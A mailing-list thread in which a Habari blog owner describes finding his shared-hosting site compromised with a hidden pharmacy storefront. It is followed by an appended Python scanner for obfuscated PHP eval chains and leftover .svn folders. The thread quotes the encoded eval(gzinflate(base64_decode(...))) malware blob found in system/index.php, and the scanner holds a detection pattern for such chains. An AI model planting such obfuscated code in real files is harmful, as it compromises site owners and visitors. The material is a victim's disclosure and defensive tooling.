Just guessing here, but maybe my vulnerability was that I was deploying straight from my svn sandbox. (So an old 0.5 or 0.6 vulnerability would still be accessible if an attacker knew where to drill down?)
Here's hoping that rm -rf `find . -type d -name .svn` helped. Sorry to be talking to myself here - but it may help someone in the future if they find unexpected code in their system/index.php, too.

--David

On Oct 9, 10:02 pm, David <david.bl...@gmail.com> wrote:
> Also, in my system/index.php, the following appears...
>
> // We start up output buffering in order to take advantage of output compression,
> // as well as the ability to dynamically change HTTP headers after output has started.
> ob_start();
> eval (gzinflate(base64_decode(
> 'RY6xDoIwFEV3Ev6hG7L0qS1oorEumpj4D82DPqQJpdhSvl8cjNM9yzm56nJWeXYN'
> .'9E420KaA3jsC0wzpO7hYw83gkLfegUvRtjA7FBD9+IogaYlHEoShqkl0dYOyrQ77'
> .'nZFbQXzqp4KVpzz7xZmxYUS3gtb3x/OmNSsZZwVgmv3g0fwVtd76AA==')));
> spl_autoload_register( 'habari_autoload' );
>
> I've got no idea how this happened. Nobody else has my password, and it's not a dictionary word, reused password or common password.
>
> --David
>
> On Oct 9, 4:24 pm, David <david.bl...@gmail.com> wrote:
> > This may not have anything to do with any weakness in Habari. But it did happen in the domain where I maintain my Habari installation. (And I'm sending this email prematurely, I'm sure.)
> >
> > My webserver is on a shared server at Dreamhost. I'm running Habari 0.7.1.
> >
> > I have the domain http://david.dlma.com redirect to http://david.dlma.com/habari in a plaintext php file. Then today, I noticed that my simple redirect turned into an eval( (gzinflate(base64_decode( ... ) ) ) string some days ago.
> >
> > It looked like the contents of this file: http://david.dlma.com/index.php_with_weird_eval_statement.txt, except I replaced the eval with an echo statement.
> >
> > Following the clues, I've got a subdirectory filled with a storefront that sells cialis with malign php code all around.
> >
> > $ ls -al
> > total 124
> > drwxr-xr-x 2 user pg844184 4096 2011-10-09 15:59 .
> > drwxr-xr-x 6 user pg844184 4096 2009-08-08 02:14 ..
> > -rw-r--r-- 1 user pg844184 8609 2011-09-27 21:19 345e2d4c5075dc599ad78c29682042f0
> > -rw-r--r-- 1 user pg844184 8119 2011-09-27 21:19 3ec3771ca32c4a6a5e040a4741016233
> > -rw-r--r-- 1 user pg844184 4456 2011-09-27 11:20 4evs8e3ear56e3f6ba4c5721d403e.php
> > ... (some more, without the .php extension) ...
> > -rw-r--r-- 1 user pg844184 104 2009-08-08 02:14 index.php
> >
> > It's probably just me, but you may want to check for eval calls where you didn't expect them.
> >
> > Luckily (or not), the storefront installed on my system was put into a subdirectory that I protected with a .htaccess authentication. So I don't think anybody saw the fake drugstore anyway.
> >
> > Sorry if this actually had nothing to do with Habari. I don't know enough about intrusions like this to be sure. I'm off to delete obviously infected files.
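The two checks the thread suggests (look for eval calls where you didn't expect them, and get .svn metadata out of the deployed tree), as an added example that is not part of the original posts: a small standard-library Python scanner that walks a web root, flags any file containing an eval()/gzinflate()/base64_decode() chain of the shape shown above (every file is checked, since the listing shows payloads without a .php extension), and reports leftover .svn directories. The demo web root, its file names and the placeholder payload string are constructed for this example.

```python
import os
import re
import tempfile

# eval( gzinflate( base64_decode( ... ))) and similar decoder chains; tolerates
# the extra "( (" and the space before "(" seen in the thread's samples.
OBFUSCATED_EVAL = re.compile(
    r"eval\s*\(\s*\(?\s*(gzinflate|gzuncompress|str_rot13|base64_decode)\s*\(",
    re.IGNORECASE)
MAX_BYTES = 2 * 1024 * 1024  # skip large files (media, archives)

def find_suspicious_eval(source):
    """1-based line numbers in source that contain an obfuscated eval chain."""
    return [n for n, line in enumerate(source.splitlines(), 1)
            if OBFUSCATED_EVAL.search(line)]

def scan_tree(root):
    """Return (path, lineno, kind) findings; lineno is 0 for directory findings."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        if ".svn" in dirnames:  # deployed straight from a working copy
            findings.append((os.path.join(dirpath, ".svn"), 0, "svn-metadata"))
            dirnames.remove(".svn")
        for name in filenames:  # check every file: payloads may lack .php
            path = os.path.join(dirpath, name)
            if os.path.getsize(path) > MAX_BYTES:
                continue
            with open(path, encoding="utf-8", errors="replace") as fh:
                for lineno in find_suspicious_eval(fh.read()):
                    findings.append((path, lineno, "obfuscated-eval"))
    return findings

def _write(path, text):
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w") as fh:
        fh.write(text)

def demo():
    """Constructed web root (hypothetical names); returns sorted findings relative to root."""
    clean = "<?php\nheader('Location: /habari');\n"
    infected = ("<?php\nob_start();\neval (gzinflate(base64_decode(\n"
                "'PLACEHOLDER_NOT_A_REAL_PAYLOAD')));\n"
                "spl_autoload_register('habari_autoload');\n")
    with tempfile.TemporaryDirectory() as root:
        _write(os.path.join(root, "index.php"), clean)
        _write(os.path.join(root, "system", "index.php"), infected)
        _write(os.path.join(root, "shop", "deadbeef"), infected)  # no .php extension
        os.makedirs(os.path.join(root, "system", ".svn"))
        return sorted((os.path.relpath(p, root), n, k) for p, n, k in scan_tree(root))
```

Run scan_tree() against the real document root and review every hit by hand; a match is a reason to look, not proof of compromise, since some legitimate packers also use eval chains.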